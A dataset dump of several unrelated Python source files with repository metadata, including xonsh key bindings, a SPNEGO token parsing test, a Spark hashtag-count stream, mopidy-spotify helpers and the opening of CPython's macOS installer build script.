def load_xonsh_bindings(ptk_bindings: KeyBindingsBase) -> KeyBindingsBase:
"""
Load custom key bindings.
Parameters
----------
ptk_bindings :
The default prompt toolkit bindings. We need these to add aliases to them.
"""
key_bindings = KeyBindings()
handle = key_bindings.add
has_selection = HasSelection()
insert_mode = ViInsertMode() | EmacsInsertMode()
if XSH.env["XONSH_CTRL_BKSP_DELETION"]:
# Not all terminal emulators emit the same keys for backspace, therefore
# ptk always maps backspace ("\x7f") to ^H ("\x08"), and all the backspace bindings are registered for ^H.
# This means we can't re-map backspace and instead we register a new "real-ctrl-bksp" key.
# See https://github.com/xonsh/xonsh/issues/4407
if ON_WINDOWS:
# On windows BKSP is "\x08" and CTRL-BKSP is "\x7f"
REAL_CTRL_BKSP = "\x7f"
# PTK uses a second mapping
from prompt_toolkit.input import win32 as ptk_win32
ptk_win32.ConsoleInputReader.mappings[b"\x7f"] = REAL_CTRL_BKSP # type: ignore
else:
REAL_CTRL_BKSP = "\x08"
# Prompt-toolkit allows using single-character keys that aren't in the `Keys` enum.
ansi_escape_sequences.ANSI_SEQUENCES[REAL_CTRL_BKSP] = REAL_CTRL_BKSP # type: ignore
ansi_escape_sequences.REVERSE_ANSI_SEQUENCES[REAL_CTRL_BKSP] = REAL_CTRL_BKSP # type: ignore
@handle(REAL_CTRL_BKSP, filter=insert_mode)
def delete_word(event):
"""Delete a single word (like ALT-backspace)"""
get_by_name("backward-kill-word").call(event)
@handle(Keys.Tab, filter=tab_insert_indent)
def insert_indent(event):
"""
If there are only whitespaces before current cursor position insert
indent instead of autocompleting.
"""
env = XSH.env
event.cli.current_buffer.insert_text(env.get("INDENT"))
@handle(Keys.Tab, filter=~tab_insert_indent & tab_menu_complete)
def menu_complete_select(event):
"""Start completion in menu-complete mode, or tab to next completion"""
b = event.current_buffer
if b.complete_state:
b.complete_next()
else:
b.start_completion(select_first=True)
@handle(Keys.ControlX, Keys.ControlE, filter=~has_selection)
def open_editor(event):
"""Open current buffer in editor"""
event.current_buffer.open_in_editor(event.cli)
@handle(Keys.BackTab, filter=insert_mode)
def insert_literal_tab(event):
"""Insert literal tab on Shift+Tab instead of autocompleting"""
b = event.current_buffer
if b.complete_state:
b.complete_previous()
else:
env = XSH.env
event.cli.current_buffer.insert_text(env.get("INDENT"))
def generate_parens_handlers(left, right):
@handle(left, filter=autopair_condition)
def insert_left_paren(event):
buffer = event.cli.current_buffer
if has_selection():
wrap_selection(buffer, left, right)
elif whitespace_or_bracket_after():
buffer.insert_text(left)
buffer.insert_text(right, move_cursor=False)
else:
buffer.insert_text(left)
@handle(right, filter=autopair_condition)
def overwrite_right_paren(event):
buffer = event.cli.current_buffer
if buffer.document.current_char == right:
buffer.cursor_position += 1
else:
buffer.insert_text(right)
generate_parens_handlers("(", ")")
generate_parens_handlers("[", "]")
generate_parens_handlers("{", "}")
def generate_quote_handler(quote):
@handle(quote, filter=autopair_condition)
def insert_quote(event):
buffer = event.cli.current_buffer
if has_selection():
wrap_selection(buffer, quote, quote)
elif buffer.document.current_char == quote:
buffer.cursor_position += 1
elif whitespace_or_bracket_before() and whitespace_or_bracket_after():
buffer.insert_text(quote)
buffer.insert_text(quote, move_cursor=False)
else:
buffer.insert_text(quote)
generate_quote_handler("'")
generate_quote_handler('"')
@handle(Keys.Backspace, filter=autopair_condition)
def delete_brackets_or_quotes(event):
"""Delete empty pair of brackets or quotes"""
buffer = event.cli.current_buffer
before = buffer.document.char_before_cursor
after = buffer.document.current_char
if any(
[before == b and after == a for (b, a) in ["()", "[]", "{}", "''", '""']]
):
buffer.delete(1)
buffer.delete_before_cursor(1)
@handle(Keys.ControlD, filter=ctrl_d_condition)
def call_exit_alias(event):
"""Use xonsh exit function"""
b = event.cli.current_buffer
b.validate_and_handle()
xonsh_exit([])
@handle(Keys.ControlJ, filter=IsMultiline() & insert_mode)
@handle(Keys.ControlM, filter=IsMultiline() & insert_mode)
def multiline_carriage_return(event):
"""Wrapper around carriage_return multiline parser"""
b = event.cli.current_buffer
carriage_return(b, event.cli)
@handle(Keys.ControlJ, filter=should_confirm_completion)
@handle(Keys.ControlM, filter=should_confirm_completion)
def enter_confirm_completion(event):
"""Ignore <enter> (confirm completion)"""
event.current_buffer.complete_state = None
@handle(Keys.Escape, filter=should_confirm_completion)
def esc_cancel_completion(event):
"""Use <ESC> to cancel completion"""
event.cli.current_buffer.cancel_completion()
@handle(Keys.Escape, Keys.ControlJ)
def execute_block_now(event):
"""Execute a block of text irrespective of cursor position"""
b = event.cli.current_buffer
b.validate_and_handle()
@handle(Keys.Left, filter=beginning_of_line)
def wrap_cursor_back(event):
"""Move cursor to end of previous line unless at beginning of
document
"""
b = event.cli.current_buffer
b.cursor_up(count=1)
relative_end_index = b.document.get_end_of_line_position()
b.cursor_right(count=relative_end_index)
@handle(Keys.Right, filter=end_of_line)
def wrap_cursor_forward(event):
"""Move cursor to beginning of next line unless at end of document"""
b = event.cli.current_buffer
relative_begin_index = b.document.get_start_of_line_position()
b.cursor_left(count=abs(relative_begin_index))
b.cursor_down(count=1)
@handle(Keys.ControlM, filter=IsSearching())
@handle(Keys.ControlJ, filter=IsSearching())
def accept_search(event):
search.accept_search()
@handle(Keys.ControlZ)
def skip_control_z(event):
"""Prevents the writing of ^Z to the prompt, if Ctrl+Z was pressed
during the previous command.
"""
pass
@handle(Keys.ControlX, Keys.ControlX, filter=has_selection)
def _cut(event):
"""Cut selected text."""
data = event.current_buffer.cut_selection()
event.app.clipboard.set_data(data)
@handle(Keys.ControlX, Keys.ControlC, filter=has_selection)
def _copy(event):
"""Copy selected text."""
data = event.current_buffer.copy_selection()
event.app.clipboard.set_data(data)
@handle(Keys.ControlV, filter=insert_mode | has_selection)
def _yank(event):
"""Paste selected text."""
buff = event.current_buffer
if buff.selection_state:
buff.cut_selection()
get_by_name("yank").call(event)
def create_alias(new_keys, original_keys):
bindings = ptk_bindings.get_bindings_for_keys(tuple(original_keys))
for original_binding in bindings:
handle(*new_keys, filter=original_binding.filter)(original_binding.handler)
# Complete a single auto-suggestion word
create_alias([Keys.ControlRight], ["escape", "f"])
return key_bindings
| 33.951613
| 114
| 0.676485
|
8e0aa91e35340eb48cf5367b084df1e158d82b10
| 28
|
py
|
Python
|
py_blender_room/framework/sceneobject.py
|
hq9000/py_blender_room
|
62b2722e42eb0411930472dea4c2fac616768e2d
|
[
"MIT"
] | 3
|
2020-11-22T17:46:27.000Z
|
2022-01-07T11:28:29.000Z
|
py_blender_room/framework/sceneobject.py
|
hq9000/py_blender_room
|
62b2722e42eb0411930472dea4c2fac616768e2d
|
[
"MIT"
] | 1
|
2020-08-31T02:46:06.000Z
|
2020-08-31T07:58:06.000Z
|
py_blender_room/framework/sceneobject.py
|
hq9000/py_blender_room
|
62b2722e42eb0411930472dea4c2fac616768e2d
|
[
"MIT"
] | null | null | null |
class SceneObject:
pass
| 9.333333
| 18
| 0.714286
|
8b4edc007c018be1ea18f54a64ddb89ddf84a3b4
| 1,661
|
py
|
Python
|
tests/test_spnego.py
|
martinhoefling/smbprotocol
|
8a4f08244a53a7a818cccc81866cfa62439c0125
|
[
"MIT"
] | null | null | null |
tests/test_spnego.py
|
martinhoefling/smbprotocol
|
8a4f08244a53a7a818cccc81866cfa62439c0125
|
[
"MIT"
] | null | null | null |
tests/test_spnego.py
|
martinhoefling/smbprotocol
|
8a4f08244a53a7a818cccc81866cfa62439c0125
|
[
"MIT"
] | null | null | null |
from pyasn1.codec.der.decoder import decode
from pyasn1.type.univ import ObjectIdentifier
from smbprotocol.spnego import InitialContextToken, NegotiateToken, MechTypes
class TestSpnego(object):
def test_parse_initial_context_token(self):
data = b"\x60\x76\x06\x06\x2b\x06\x01\x05" \
b"\x05\x02\xa0\x6c\x30\x6a\xa0\x3c" \
b"\x30\x3a\x06\x0a\x2b\x06\x01\x04" \
b"\x01\x82\x37\x02\x02\x1e\x06\x09" \
b"\x2a\x86\x48\x82\xf7\x12\x01\x02" \
b"\x02\x06\x09\x2a\x86\x48\x86\xf7" \
b"\x12\x01\x02\x02\x06\x0a\x2a\x86" \
b"\x48\x86\xf7\x12\x01\x02\x02\x03" \
b"\x06\x0a\x2b\x06\x01\x04\x01\x82" \
b"\x37\x02\x02\x0a\xa3\x2a\x30\x28" \
b"\xa0\x26\x1b\x24\x6e\x6f\x74\x5f" \
b"\x64\x65\x66\x69\x6e\x65\x64\x5f" \
b"\x69\x6e\x5f\x52\x46\x43\x34\x31" \
b"\x37\x38\x40\x70\x6c\x65\x61\x73" \
b"\x65\x5f\x69\x67\x6e\x6f\x72\x65"
actual, rdata = decode(data, asn1Spec=InitialContextToken())
assert rdata == b""
assert actual['thisMech'] == ObjectIdentifier('1.3.6.1.5.5.2')
assert isinstance(actual['innerContextToken'], NegotiateToken)
actual_token = actual['innerContextToken']['negTokenInit']
assert actual_token['mechTypes'] == [
MechTypes.NEGOEX,
MechTypes.MS_KRB5,
MechTypes.KRB5,
MechTypes.KRB5_U2U,
MechTypes.NTLMSSP
]
assert actual_token['negHints']['hintName'] == \
"not_defined_in_RFC4178@please_ignore"
| 41.525
| 77
| 0.578567
|
4dff9b293bf5a1dcd67e1200ba30c20d6c5091a7
| 554
|
py
|
Python
|
setup.py
|
logmatic/logmatic-python
|
15d39c8c05f903054aaed9a5213f47756c0870ec
|
[
"MIT"
] | 38
|
2016-02-12T17:02:16.000Z
|
2019-03-28T19:56:27.000Z
|
setup.py
|
logmatic/logmatic-python
|
15d39c8c05f903054aaed9a5213f47756c0870ec
|
[
"MIT"
] | 7
|
2016-03-03T17:03:09.000Z
|
2018-01-04T12:29:05.000Z
|
setup.py
|
logmatic/logmatic-python
|
15d39c8c05f903054aaed9a5213f47756c0870ec
|
[
"MIT"
] | 10
|
2016-02-23T09:34:12.000Z
|
2018-11-23T00:30:07.000Z
|
from distutils.core import setup
setup(
name='logmatic-python',
version='0.1.7',
author='Logmatic.io support team',
author_email='support@logmatic.io',
packages = ['logmatic'],
scripts=[],
url='https://github.com/logmatic/logmatic-python',
download_url = 'https://github.com/logmatic/logmatic-python/tarball/0.1.6',
license='MIT',
long_description=open('README.rst').read(),
description='Python plugin to send logs to Logmatic.io',
install_requires = ['python-json-logger'],
keywords = ['logmatic']
)
| 30.777778
| 79
| 0.673285
|
b5b9061cac9e8b8a6405a456f35de4d5cc224353
| 5,251
|
py
|
Python
|
clumioapi/models/audit_parent_entity.py
|
clumio-code/clumio-python-sdk
|
63bfaf3afed5c0ab4bae3dd1be52271249d07c51
|
[
"Apache-2.0"
] | null | null | null |
clumioapi/models/audit_parent_entity.py
|
clumio-code/clumio-python-sdk
|
63bfaf3afed5c0ab4bae3dd1be52271249d07c51
|
[
"Apache-2.0"
] | 1
|
2021-09-16T05:56:05.000Z
|
2021-09-16T05:56:05.000Z
|
clumioapi/models/audit_parent_entity.py
|
clumio-code/clumio-python-sdk
|
63bfaf3afed5c0ab4bae3dd1be52271249d07c51
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2021. Clumio, Inc.
#
from typing import Any, Dict, Mapping, Optional, Sequence, Type, TypeVar
T = TypeVar('T', bound='AuditParentEntity')
class AuditParentEntity:
"""Implementation of the 'AuditParentEntity' model.
The parent object of the primary entity associated with or affected by the
audit.If the primary entity is not a vmware entity, this field will have a value
of nullFor example, "vmware_vcenter" is the parent entity of primary entity
"vmware_vm".
Attributes:
id:
A system-generated ID assigned to this entity.
type:
The following table describes the entity types that Clumio supports.
+--------------------------------+---------------------------------------------+
| Entity Type | Details |
+================================+=============================================+
| vmware_vcenter | VMware vCenter. |
+--------------------------------+---------------------------------------------+
| vmware_vm | VMware virtual machine. |
+--------------------------------+---------------------------------------------+
| vmware_vm_folder | VMware VM folder. |
+--------------------------------+---------------------------------------------+
| vmware_datacenter | VMware data center. |
+--------------------------------+---------------------------------------------+
| vmware_datacenter_folder | VMware data center folder. |
+--------------------------------+---------------------------------------------+
| vmware_tag | VMware tag. |
+--------------------------------+---------------------------------------------+
| vmware_category | VMware tag category. |
+--------------------------------+---------------------------------------------+
| vmware_compute_resource | VMware compute resource. |
+--------------------------------+---------------------------------------------+
| vmware_compute_resource_folder | VMware compute resource folder. |
+--------------------------------+---------------------------------------------+
| aws_ebs_volume | AWS EBS volume. |
+--------------------------------+---------------------------------------------+
| aws_connection | AWS connection mediated by a CloudFormation |
| | stack. |
+--------------------------------+---------------------------------------------+
| aws_environment | AWS environment specified by an |
| | account/region pair. |
+--------------------------------+---------------------------------------------+
| aws_tag | AWS tag. |
+--------------------------------+---------------------------------------------+
| aws_cmk | AWS Customer Master Key used to encrypt |
| | data. |
+--------------------------------+---------------------------------------------+
value:
A system-generated value assigned to the entity. For example, if the primary
entity type is "vmware_vm" for a virtual machine, then the value is the name of
the VM.
"""
# Create a mapping from Model property names to API property names
_names = {'id': 'id', 'type': 'type', 'value': 'value'}
def __init__(self, id: str = None, type: str = None, value: str = None) -> None:
"""Constructor for the AuditParentEntity class."""
# Initialize members of the class
self.id: str = id
self.type: str = type
self.value: str = value
@classmethod
def from_dictionary(cls: Type, dictionary: Mapping[str, Any]) -> Optional[T]:
"""Creates an instance of this model from a dictionary
Args:
dictionary: A dictionary representation of the object as obtained
from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if not dictionary:
return None
# Extract variables from the dictionary
id = dictionary.get('id')
type = dictionary.get('type')
value = dictionary.get('value')
# Return an object of this model
return cls(id, type, value)
| 54.697917
| 92
| 0.354028
|
a115476a9cc5b9a34dc970ac9322ab78255c1495
| 377
|
py
|
Python
|
manafa/parsing/batteryStats/__init__.py
|
greensoftwarelab/E-MANAFA
|
d0ccc01a821af5b02fdcb588a4d14ff56a26cd5d
|
[
"MIT"
] | null | null | null |
manafa/parsing/batteryStats/__init__.py
|
greensoftwarelab/E-MANAFA
|
d0ccc01a821af5b02fdcb588a4d14ff56a26cd5d
|
[
"MIT"
] | null | null | null |
manafa/parsing/batteryStats/__init__.py
|
greensoftwarelab/E-MANAFA
|
d0ccc01a821af5b02fdcb588a4d14ff56a26cd5d
|
[
"MIT"
] | null | null | null |
""" This module contains Classes to parse and manipulate information coming from the BatteryStats Android Service.
BatteryStatsConstants contains constants associated with batterystats events and respective meaning. BatteryStatsParser.py
contains BatteryStatsParser and utils to parse dumpsys batterystats output and obtain/filter events occured during given
time ranges.
"""
| 53.857143
| 122
| 0.848806
|
1411de61c0e7846ff337cb133583c0a9df4ceec3
| 281
|
py
|
Python
|
apps/core/managers.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
apps/core/managers.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
apps/core/managers.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
from django.db import models
from .query import UndeletedQuerySet
class UndeletedManager(models.Manager):
def get_queryset(self):
return UndeletedQuerySet(
model=self.model, using=self._db,
hints=self._hints).filter(deleted_at__isnull=True)
| 23.416667
| 62
| 0.715302
|
71795db1e29dc4a3c9d5344a142b36b029a06a8d
| 1,438
|
py
|
Python
|
adminmgr/media/code/A3/task1/BD_0012_0792_0948_1324_5SDKuyT.py
|
IamMayankThakur/test-bigdata
|
cef633eb394419b955bdce479699d0115d8f99c3
|
[
"Apache-2.0"
] | 9
|
2019-11-08T02:05:27.000Z
|
2021-12-13T12:06:35.000Z
|
adminmgr/media/code/A3/task1/BD_0012_0792_0948_1324_5SDKuyT.py
|
IamMayankThakur/test-bigdata
|
cef633eb394419b955bdce479699d0115d8f99c3
|
[
"Apache-2.0"
] | 6
|
2019-11-27T03:23:16.000Z
|
2021-06-10T19:15:13.000Z
|
adminmgr/media/code/A3/task1/BD_0012_0792_0948_1324_5SDKuyT.py
|
IamMayankThakur/test-bigdata
|
cef633eb394419b955bdce479699d0115d8f99c3
|
[
"Apache-2.0"
] | 4
|
2019-11-26T17:04:27.000Z
|
2021-12-13T11:57:03.000Z
|
from __future__ import print_function
import sys
from pyspark.sql import SparkSession
from pyspark.sql.functions import *
from pyspark.sql.types import *
spark_session_obj = SparkSession.builder\
.appName('StructuredSpark')\
.getOrCreate()
userSchema = StructType([
StructField('ID', IntegerType(), True),
StructField('Lang', StringType(), True),
StructField('Date', StringType(), True),
StructField('Source', StringType(), True),
StructField('Len', IntegerType(), True),
StructField('Likes', IntegerType(), True),
StructField('RTs', IntegerType(), True),
StructField('Hashtags', StringType(), True),
StructField('UserMentionNames', StringType(), True),
StructField('UserMentionID', StringType(), True),
StructField('Name', StringType(), True),
StructField('Place', StringType(), True),
StructField('Followers', IntegerType(), True),
StructField('Friends', IntegerType(), True)
])
wordlin_dataframe = spark_session_obj.readStream\
.option('sep', ';')\
.option('header', 'false')\
.schema(userSchema)\
.csv("hdfs://localhost:9000/stream")
wordlin_dataframe.createOrReplaceTempView("tables")
common_hashtag_dataframe = spark_session_obj.sql("select Hashtags, count(Hashtags) as count from tables group by Hashtags order by count desc limit 5")
query_obj = common_hashtag_dataframe.writeStream\
.outputMode('complete').format('console')
query_run = query_obj.start()
query_run.awaitTermination(100)
query_run.stop()
| 32.681818
| 151
| 0.75452
|
f48bc7142d0b61afd9e9667af7ef52344b2d91ba
| 275
|
py
|
Python
|
Python/Sets/Set .difference() Operation.py
|
guptamadhur/HackerRank
|
e0f1ba82296eea88d2b34132d3b1a28cd67ffa03
|
[
"MIT"
] | null | null | null |
Python/Sets/Set .difference() Operation.py
|
guptamadhur/HackerRank
|
e0f1ba82296eea88d2b34132d3b1a28cd67ffa03
|
[
"MIT"
] | null | null | null |
Python/Sets/Set .difference() Operation.py
|
guptamadhur/HackerRank
|
e0f1ba82296eea88d2b34132d3b1a28cd67ffa03
|
[
"MIT"
] | null | null | null |
# Author: Madhur Gupta
# Github: github.com/guptamadhur
# Project: Hacker Rank Practice Python
if __name__ == '__main__':
n = int(input())
A = set(map(int,input().split()))
n = int(input())
B = set(map(int, input().split()))
print(len(A.difference(B)))
| 22.916667
| 38
| 0.618182
|
d5308f4cc7137d2226e4a963a923b3db362368c5
| 3,350
|
py
|
Python
|
Database/client_methods.py
|
RomaOkorosso/fes-test-task
|
cfd8212dfbc9b2b0669ce6e1ea0a59b3f96809dc
|
[
"MIT"
] | null | null | null |
Database/client_methods.py
|
RomaOkorosso/fes-test-task
|
cfd8212dfbc9b2b0669ce6e1ea0a59b3f96809dc
|
[
"MIT"
] | null | null | null |
Database/client_methods.py
|
RomaOkorosso/fes-test-task
|
cfd8212dfbc9b2b0669ce6e1ea0a59b3f96809dc
|
[
"MIT"
] | null | null | null |
# created by RomaOkorosso at 21.03.2021
# client_methods.py
from datetime import datetime, timedelta, date
from typing import Optional, List
from Models.models import Client, TakenBook, Book
from Models import schemas
from sqlalchemy.orm import Session
from Database.exceptions import *
from pydantic import ValidationError
class ClientMethods:
@staticmethod
def add_client(db: Session, client: schemas.AddClient):
client = Client(**client.dict())
db.add(client)
db.commit()
return client
@staticmethod
def get_client(db: Session, client_id: int):
client: Client = db.query(Client).filter(Client.id == client_id).first()
if client is None:
raise ItemNotFound(f"Have no client with id: {client_id} in database")
return client
@staticmethod
def update_client(db: Session, new_client: schemas.Client):
client = db.query(Client).filter(Client.id == new_client.id).first()
if client is None:
raise ItemNotFound(f"Have no client with id: {new_client.id} in database")
for key, value in new_client.__dict__.iteritems():
setattr(client, key, value)
db.commit()
@staticmethod
def take_book(db: Session, book_id: int, client_id: int):
book: Book = db.query(Book).filter(Book.id == book_id).first()
try:
client = ClientMethods.get_client(db, client_id)
except ItemNotFound as err:
print(err)
else:
if client.taken_books_now_id is None:
client.taken_books_now_id = [book_id]
if client.all_taken_books_id is None:
client.all_taken_books_id = [book_id]
client.taken_books_now_id = client.taken_books_now_id.append(book_id)
client.all_taken_books_id = client.all_taken_books_id.append(book_id)
if book is None:
raise ItemNotFound(f"Have no such book with id: {book_id}")
if book.count == 0:
raise NotEnoughBook(f"Have no enough books with id: {book_id}")
taken_book = TakenBook(
book_id=book_id,
client_id=client_id,
taken_date=datetime.today().date()
)
book.count -= 1
db.add(taken_book)
db.commit()
db.flush()
db.refresh(book)
return book
@staticmethod
def return_book(db: Session, taken_book_id: int):
from Database.book_methods import BookMethods
try:
book: Book
client: Client
BookMethods.return_book(db, taken_book_id)
taken_book = BookMethods.get_taken_book_by_id(db, taken_book_id)
book_id = taken_book.id
client_id = taken_book.client_id
book = BookMethods.get_book(db, book_id)
client = ClientMethods.get_client(db, client_id)
except ItemNotFound as err:
print(err)
else:
print(type(client.taken_books_now_id))
books: List[int] = client.taken_books_now_id.copy()
books.remove(book_id)
client.taken_books_now_id = books
book.count = book.count + 1
book.taken_count = book.taken_count + 1
ClientMethods.update_client(db, client)
db.commit()
return book
| 33.5
| 86
| 0.625075
|
746bcce002d007d7be186ffdbf8be9207ef9e47e
| 3,784
|
py
|
Python
|
mopidy_spotify/distinct.py
|
jimbofreedman/mopidy-spotify
|
6b3f41368cc22653d13c1ac1696e66bd5744a95a
|
[
"Apache-2.0"
] | 7
|
2018-06-24T12:57:19.000Z
|
2020-04-28T14:35:26.000Z
|
mopidy_spotify/distinct.py
|
jimbofreedman/mopidy-spotify
|
6b3f41368cc22653d13c1ac1696e66bd5744a95a
|
[
"Apache-2.0"
] | null | null | null |
mopidy_spotify/distinct.py
|
jimbofreedman/mopidy-spotify
|
6b3f41368cc22653d13c1ac1696e66bd5744a95a
|
[
"Apache-2.0"
] | 3
|
2018-05-29T00:05:37.000Z
|
2019-02-28T09:47:43.000Z
|
from __future__ import unicode_literals
import logging
import spotify
from mopidy_spotify import search
logger = logging.getLogger(__name__)
def get_distinct(config, session, web_client, field, query=None):
# To make the returned data as interesting as possible, we limit
# ourselves to data extracted from the user's playlists when no search
# query is included.
if field == 'artist':
result = _get_distinct_artists(
config, session, web_client, query)
elif field == 'albumartist':
result = _get_distinct_albumartists(
config, session, web_client, query)
elif field == 'album':
result = _get_distinct_albums(
config, session, web_client, query)
elif field == 'date':
result = _get_distinct_dates(
config, session, web_client, query)
else:
result = set()
return result - {None}
def _get_distinct_artists(config, session, web_client, query):
logger.debug('Getting distinct artists: %s', query)
if query:
search_result = _get_search(
config, session, web_client, query, artist=True)
return {artist.name for artist in search_result.artists}
else:
return {
artist.name
for track in _get_playlist_tracks(config, session)
for artist in track.artists}
def _get_distinct_albumartists(config, session, web_client, query):
logger.debug(
'Getting distinct albumartists: %s', query)
if query:
search_result = _get_search(
config, session, web_client, query, album=True)
return {
artist.name
for album in search_result.albums
for artist in album.artists
if album.artists}
else:
return {
track.album.artist.name
for track in _get_playlist_tracks(config, session)
if track.album and track.album.artist}
def _get_distinct_albums(config, session, web_client, query):
logger.debug('Getting distinct albums: %s', query)
if query:
search_result = _get_search(
config, session, web_client, query, album=True)
return {album.name for album in search_result.albums}
else:
return {
track.album.name
for track in _get_playlist_tracks(config, session)
if track.album}
def _get_distinct_dates(config, session, web_client, query):
logger.debug('Getting distinct album years: %s', query)
if query:
search_result = _get_search(
config, session, web_client, query, album=True)
return {
album.date
for album in search_result.albums
if album.date not in (None, '0')}
else:
return {
'%s' % track.album.year
for track in _get_playlist_tracks(config, session)
if track.album and track.album.year not in (None, 0)}
def _get_search(
config, session, web_client, query,
album=False, artist=False, track=False):
types = []
if album:
types.append('album')
if artist:
types.append('artist')
if track:
types.append('track')
return search.search(
config, session, web_client, query, types=types)
def _get_playlist_tracks(config, session):
if not config['allow_playlists']:
return
for playlist in session.playlist_container:
if not isinstance(playlist, spotify.Playlist):
continue
playlist.load(config['timeout'])
for track in playlist.tracks:
try:
track.load(config['timeout'])
yield track
except spotify.Error: # TODO Why did we get "General error"?
continue
| 30.031746
| 74
| 0.624207
|
4bb942a733b86fa63b62487fe39e6b6376b8011b
| 61,737
|
py
|
Python
|
Mac/BuildScript/build-installer.py
|
myarchsource/python2
|
967e509ff8ad450919d5cf708b8e35387b63db03
|
[
"CNRI-Python-GPL-Compatible"
] | 473
|
2017-02-03T04:03:02.000Z
|
2022-02-12T17:44:25.000Z
|
Mac/BuildScript/build-installer.py
|
myarchsource/python2
|
967e509ff8ad450919d5cf708b8e35387b63db03
|
[
"CNRI-Python-GPL-Compatible"
] | 70
|
2017-02-02T21:20:07.000Z
|
2022-02-04T15:32:45.000Z
|
Mac/BuildScript/build-installer.py
|
myarchsource/python2
|
967e509ff8ad450919d5cf708b8e35387b63db03
|
[
"CNRI-Python-GPL-Compatible"
] | 37
|
2017-02-11T21:02:34.000Z
|
2020-11-16T10:51:45.000Z
|
#!/usr/bin/env python
"""
This script is used to build "official" universal installers on macOS.
NEW for 3.6.8 / 2.7.16:
- also build and use Tk 8.6 for 10.6+ installers
NEW for 3.6.5:
- support Intel 64-bit-only () and 32-bit-only installer builds
- build and link with private Tcl/Tk 8.6 for 10.9+ builds
- deprecate use of explicit SDK (--sdk-path=) since all but the oldest
versions of Xcode support implicit setting of an SDK via environment
variables (SDKROOT and friends, see the xcrun man page for more info).
The SDK stuff was primarily needed for building universal installers
for 10.4; so as of 3.6.5, building installers for 10.4 is no longer
supported with build-installer.
- use generic "gcc" as compiler (CC env var) rather than "gcc-4.2"
Please ensure that this script keeps working with Python 2.5, to avoid
bootstrap issues (/usr/bin/python is Python 2.5 on OSX 10.5). Doc builds
use current versions of Sphinx and require a reasonably current python3.
Sphinx and dependencies are installed into a venv using the python3's pip
so will fetch them from PyPI if necessary. Since python3 is now used for
Sphinx, build-installer.py should also be converted to use python3!
For 10.6 or greater deployment targets, build-installer builds and links
with its own copy of Tcl/Tk 8.6 and the rest of this paragraph does not
apply. Otherwise, build-installer requires an installed third-party version
of Tcl/Tk 8.4 (for OS X 10.4 and 10.5 deployment targets) installed in
/Library/Frameworks. For 10.4 or 10.5, the Python built by this script
when installed will attempt to dynamically link first to Tcl and Tk frameworks
in /Library/Frameworks if available otherwise fall back to the ones in
/System/Library/Framework. For 10.4 or 10.5, we recommend
installing the most recent ActiveTcl 8.5 or 8.4 version, depending
on the deployment target. The actual version linked to depends on the
path of /Library/Frameworks/{Tcl,Tk}.framework/Versions/Current.
Usage: see USAGE variable in the script.
"""
import platform, os, sys, getopt, textwrap, shutil, stat, time, pwd, grp
try:
import urllib2 as urllib_request
except ImportError:
import urllib.request as urllib_request
STAT_0o755 = ( stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
| stat.S_IRGRP | stat.S_IXGRP
| stat.S_IROTH | stat.S_IXOTH )
STAT_0o775 = ( stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
| stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP
| stat.S_IROTH | stat.S_IXOTH )
INCLUDE_TIMESTAMP = 1
VERBOSE = 1
from plistlib import Plist
try:
from plistlib import writePlist
except ImportError:
# We're run using python2.3
def writePlist(plist, path):
plist.write(path)
def shellQuote(value):
"""
Return the string value in a form that can safely be inserted into
a shell command.
"""
return "'%s'"%(value.replace("'", "'\"'\"'"))
def grepValue(fn, variable):
"""
Return the unquoted value of a variable from a file..
QUOTED_VALUE='quotes' -> str('quotes')
UNQUOTED_VALUE=noquotes -> str('noquotes')
"""
variable = variable + '='
for ln in open(fn, 'r'):
if ln.startswith(variable):
value = ln[len(variable):].strip()
return value.strip("\"'")
raise RuntimeError("Cannot find variable %s" % variable[:-1])
_cache_getVersion = None
def getVersion():
global _cache_getVersion
if _cache_getVersion is None:
_cache_getVersion = grepValue(
os.path.join(SRCDIR, 'configure'), 'PACKAGE_VERSION')
return _cache_getVersion
def getVersionMajorMinor():
return tuple([int(n) for n in getVersion().split('.', 2)])
_cache_getFullVersion = None
def getFullVersion():
global _cache_getFullVersion
if _cache_getFullVersion is not None:
return _cache_getFullVersion
fn = os.path.join(SRCDIR, 'Include', 'patchlevel.h')
for ln in open(fn):
if 'PY_VERSION' in ln:
_cache_getFullVersion = ln.split()[-1][1:-1]
return _cache_getFullVersion
raise RuntimeError("Cannot find full version??")
FW_PREFIX = ["Library", "Frameworks", "Python.framework"]
FW_VERSION_PREFIX = "--undefined--" # initialized in parseOptions
FW_SSL_DIRECTORY = "--undefined--" # initialized in parseOptions
# The directory we'll use to create the build (will be erased and recreated)
WORKDIR = "/tmp/_py"
# The directory we'll use to store third-party sources. Set this to something
# else if you don't want to re-fetch required libraries every time.
DEPSRC = os.path.join(WORKDIR, 'third-party')
DEPSRC = os.path.expanduser('~/Universal/other-sources')
universal_opts_map = { '32-bit': ('i386', 'ppc',),
'64-bit': ('x86_64', 'ppc64',),
'intel': ('i386', 'x86_64'),
'intel-32': ('i386',),
'intel-64': ('x86_64',),
'3-way': ('ppc', 'i386', 'x86_64'),
'all': ('i386', 'ppc', 'x86_64', 'ppc64',) }
default_target_map = {
'64-bit': '10.5',
'3-way': '10.5',
'intel': '10.5',
'intel-32': '10.4',
'intel-64': '10.5',
'all': '10.5',
}
UNIVERSALOPTS = tuple(universal_opts_map.keys())
UNIVERSALARCHS = '32-bit'
ARCHLIST = universal_opts_map[UNIVERSALARCHS]
# Source directory (assume we're in Mac/BuildScript)
SRCDIR = os.path.dirname(
os.path.dirname(
os.path.dirname(
os.path.abspath(__file__
))))
# $MACOSX_DEPLOYMENT_TARGET -> minimum OS X level
DEPTARGET = '10.5'
def getDeptargetTuple():
return tuple([int(n) for n in DEPTARGET.split('.')[0:2]])
def getTargetCompilers():
target_cc_map = {
'10.4': ('gcc-4.0', 'g++-4.0'),
'10.5': ('gcc', 'g++'),
'10.6': ('gcc', 'g++'),
}
return target_cc_map.get(DEPTARGET, ('gcc', 'g++') )
CC, CXX = getTargetCompilers()
